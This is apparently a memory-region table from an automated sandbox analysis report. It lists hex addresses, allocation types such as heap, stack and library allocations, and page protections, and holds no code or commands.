256D0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
22A4F000
|
stack
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
2504C000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F535A8000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
25240000
|
trusted library allocation
|
page read and write
|
||
16B56920000
|
trusted library allocation
|
page read and write
|
||
7BD0000
|
heap
|
page read and write
|
||
29F535E5000
|
heap
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
161000
|
unkown
|
page execute read
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
27DB000
|
trusted library allocation
|
page read and write
|
||
72D7000
|
heap
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
16B58330000
|
heap
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
16B589C0000
|
trusted library allocation
|
page read and write
|
||
16B568E0000
|
trusted library allocation
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
7DEA000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
4B3E000
|
stack
|
page read and write
|
||
425F000
|
stack
|
page read and write
|
||
3BC000
|
heap
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
4E92000
|
trusted library allocation
|
page read and write
|
||
82D0000
|
direct allocation
|
page read and write
|
||
275D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
2287E000
|
stack
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
16B70863000
|
heap
|
page read and write
|
||
72D3000
|
heap
|
page read and write
|
||
2FD298E000
|
stack
|
page read and write
|
||
29F5166C000
|
heap
|
page read and write
|
||
7170000
|
heap
|
page read and write
|
||
7FFAAC2E2000
|
trusted library allocation
|
page read and write
|
||
6D0E000
|
stack
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
3E2000
|
heap
|
page read and write
|
||
16B581C0000
|
heap
|
page execute and read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251F0000
|
trusted library allocation
|
page read and write
|
||
70CE000
|
stack
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
3220000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
44D0000
|
remote allocation
|
page execute and read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
8BE0000
|
direct allocation
|
page execute and read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page execute and read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
72CD000
|
heap
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
4DD4000
|
trusted library allocation
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
2A5F000
|
stack
|
page read and write
|
||
2A267860000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
2435CE70000
|
heap
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
252CF000
|
stack
|
page read and write
|
||
3EF000
|
heap
|
page read and write
|
||
7260000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
75C0000
|
heap
|
page read and write
|
||
74C0000
|
direct allocation
|
page read and write
|
||
7520000
|
direct allocation
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
7FFAAC1B0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
16B566E2000
|
heap
|
page read and write
|
||
16B5A2F9000
|
trusted library allocation
|
page read and write
|
||
29F53490000
|
heap
|
page read and write
|
||
25048000
|
heap
|
page read and write
|
||
3222000
|
trusted library allocation
|
page read and write
|
||
29F53120000
|
remote allocation
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
6ADD000
|
stack
|
page read and write
|
||
22C5E000
|
stack
|
page read and write
|
||
22940000
|
trusted library allocation
|
page read and write
|
||
16B58501000
|
trusted library allocation
|
page read and write
|
||
7FFAAC400000
|
trusted library allocation
|
page read and write
|
||
270E000
|
stack
|
page read and write
|
||
431E000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
41DE000
|
stack
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
4210000
|
heap
|
page read and write
|
||
29F53B0A000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
2401E000
|
trusted library allocation
|
page read and write
|
||
29F53481000
|
heap
|
page read and write
|
||
7FFAAC2F0000
|
trusted library allocation
|
page execute and read and write
|
||
29F534A7000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
7FFB1E3A1000
|
unkown
|
page execute read
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
24AE000
|
unkown
|
page read and write
|
||
531C000
|
stack
|
page read and write
|
||
27A0000
|
trusted library allocation
|
page read and write
|
||
429C000
|
stack
|
page read and write
|
||
45E5000
|
remote allocation
|
page execute and read and write
|
||
16B58585000
|
trusted library allocation
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
2FD2A8D000
|
stack
|
page read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
2FD1D3E000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2FD1BBF000
|
stack
|
page read and write
|
||
16B566DC000
|
heap
|
page read and write
|
||
4591000
|
trusted library allocation
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
6F70000
|
heap
|
page execute and read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
2435CE78000
|
heap
|
page read and write
|
||
29F53120000
|
remote allocation
|
page read and write
|
||
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
16B566A1000
|
heap
|
page read and write
|
||
72D7000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
25320000
|
trusted library allocation
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
4686000
|
trusted library allocation
|
page read and write
|
||
23042000
|
trusted library allocation
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
29F5370F000
|
heap
|
page read and write
|
||
7510000
|
direct allocation
|
page read and write
|
||
8250000
|
direct allocation
|
page read and write
|
||
25190000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
29F535A7000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
3212000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
29F535A9000
|
heap
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
165000
|
unkown
|
page readonly
|
||
29F534A7000
|
heap
|
page read and write
|
||
16B5827A000
|
heap
|
page read and write
|
||
16B581C7000
|
heap
|
page execute and read and write
|
||
22FB0000
|
heap
|
page execute and read and write
|
||
4B80000
|
heap
|
page read and write
|
||
82A0000
|
direct allocation
|
page read and write
|
||
2769000
|
trusted library allocation
|
page read and write
|
||
2A26775B000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
25077000
|
heap
|
page read and write
|
||
CF96BDF000
|
stack
|
page read and write
|
||
29F5396E000
|
heap
|
page read and write
|
||
7FFAAC220000
|
trusted library allocation
|
page execute and read and write
|
||
29F534A3000
|
heap
|
page read and write
|
||
29D000
|
stack
|
page read and write
|
||
25007000
|
heap
|
page read and write
|
||
251F0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
7DEF000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
72D3000
|
heap
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
3230000
|
trusted library allocation
|
page execute and read and write
|
||
16B5A31F000
|
trusted library allocation
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
16B5A2E6000
|
trusted library allocation
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
7460000
|
heap
|
page read and write
|
||
29F5349C000
|
heap
|
page read and write
|
||
2FD15EE000
|
stack
|
page read and write
|
||
29F535E5000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
2BC000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
4B7F000
|
stack
|
page read and write
|
||
7FFB1E3C2000
|
unkown
|
page readonly
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2AFF000
|
stack
|
page read and write
|
||
2FD18FE000
|
stack
|
page read and write
|
||
16B7095B000
|
heap
|
page read and write
|
||
4D0000
|
trusted library section
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
251A1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
43EF000
|
stack
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
6D98000
|
heap
|
page read and write
|
||
7E55000
|
heap
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
25200000
|
trusted library allocation
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
16B56860000
|
heap
|
page read and write
|
||
7DF8000
|
heap
|
page read and write
|
||
2A267AD0000
|
heap
|
page read and write
|
||
16B70860000
|
heap
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
4368000
|
heap
|
page read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
16B70940000
|
heap
|
page read and write
|
||
2A267960000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
A0F5000
|
direct allocation
|
page execute and read and write
|
||
29F5361B000
|
heap
|
page read and write
|
||
22E10000
|
trusted library allocation
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
74A0000
|
direct allocation
|
page read and write
|
||
813B000
|
stack
|
page read and write
|
||
161000
|
unkown
|
page execute read
|
||
29F5362B000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
16B5A42A000
|
trusted library allocation
|
page read and write
|
||
2FD2B0A000
|
stack
|
page read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
6DB1000
|
heap
|
page read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
4BFF000
|
stack
|
page read and write
|
||
6A2D000
|
stack
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
16B584C0000
|
heap
|
page execute and read and write
|
||
29F5166C000
|
heap
|
page read and write
|
||
16B56667000
|
heap
|
page read and write
|
||
29F51998000
|
heap
|
page read and write
|
||
7E03000
|
heap
|
page read and write
|
||
8270000
|
trusted library allocation
|
page execute and read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
2435D010000
|
heap
|
page read and write
|
||
16B5A33B000
|
trusted library allocation
|
page read and write
|
||
4AFE000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
558E000
|
trusted library allocation
|
page read and write
|
||
6C8E000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
510F000
|
stack
|
page read and write
|
||
16B589C8000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
6EC10000
|
unkown
|
page readonly
|
||
29F51634000
|
heap
|
page read and write
|
||
25237000
|
trusted library allocation
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
29F51653000
|
heap
|
page read and write
|
||
16B5A38F000
|
trusted library allocation
|
page read and write
|
||
22F6C000
|
stack
|
page read and write
|
||
2850000
|
heap
|
page read and write
|
||
16B589D9000
|
trusted library allocation
|
page read and write
|
||
2FD197C000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
16B58230000
|
heap
|
page read and write
|
||
3225000
|
trusted library allocation
|
page execute and read and write
|
||
16B5A377000
|
trusted library allocation
|
page read and write
|
||
710D000
|
stack
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7FFAAC2BA000
|
trusted library allocation
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
7FFAAC2B1000
|
trusted library allocation
|
page read and write
|
||
82E0000
|
direct allocation
|
page read and write
|
||
25710000
|
trusted library allocation
|
page read and write
|
||
16B56950000
|
trusted library allocation
|
page read and write
|
||
17D000
|
unkown
|
page readonly
|
||
29F53649000
|
heap
|
page read and write
|
||
7DE4000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
72CC000
|
heap
|
page read and write
|
||
22DB6000
|
trusted library allocation
|
page read and write
|
||
16B70966000
|
heap
|
page read and write
|
||
290C000
|
heap
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
251F0000
|
trusted library allocation
|
page read and write
|
||
17D000
|
unkown
|
page readonly
|
||
25710000
|
trusted library allocation
|
page read and write
|
||
2283E000
|
stack
|
page read and write
|
||
7FFAAC2A0000
|
trusted library allocation
|
page read and write
|
||
2FD1B78000
|
stack
|
page read and write
|
||
30ED000
|
stack
|
page read and write
|
||
72A3000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
2501E000
|
heap
|
page read and write
|
There are 1071 hidden memdumps, click here to show them.